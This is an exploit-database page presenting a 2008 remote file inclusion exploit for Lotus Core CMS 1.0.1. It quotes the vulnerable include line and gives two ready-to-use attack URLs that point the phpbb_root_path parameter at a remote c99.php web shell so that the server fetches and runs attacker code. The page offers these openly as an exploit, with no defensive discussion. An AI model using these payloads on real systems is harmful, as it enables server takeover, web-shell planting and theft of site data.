[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Lotus Core CMS 1.0.1 Remote File Inclusion Vulnerabilities

Author
Ciph3r
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3227
Category
web applications
Date add
18-06-2008
Platform
unsorted
==========================================================
Lotus Core CMS 1.0.1 Remote File Inclusion Vulnerabilities
==========================================================



###############################################################
#
# [phpbb3] Lotus Core CMS v1.0.1 Remote File Include Vulnerabilities 
#
###############################################################
#
# Discovered by : Ciph3r
#
# SP TANX4 : Iranian hacker & Kurdish Security TEAM 
#
# CLASS : remote
#
################################################################
#
# C0de : 
#                
#                  
#    include($phpbb_root_path . 'includes/bbcode.' . $phpEx);
#       
#        
###############################################################

EXPLOIT :

 
 http://127.0.0.1/cms/Lotus%20Core%20v1.0.1/system/plugins/index.php?phpbb_root_path=http://127.0.0.1/c99.php?
 
 http://127.0.0.1/cms/Lotus%20Core%20v1.0.1/system/plugins/error/404.php?phpbb_root_path=http://127.0.0.1/c99.php?


#####################################################################



#  0day.today [2024-09-12]  #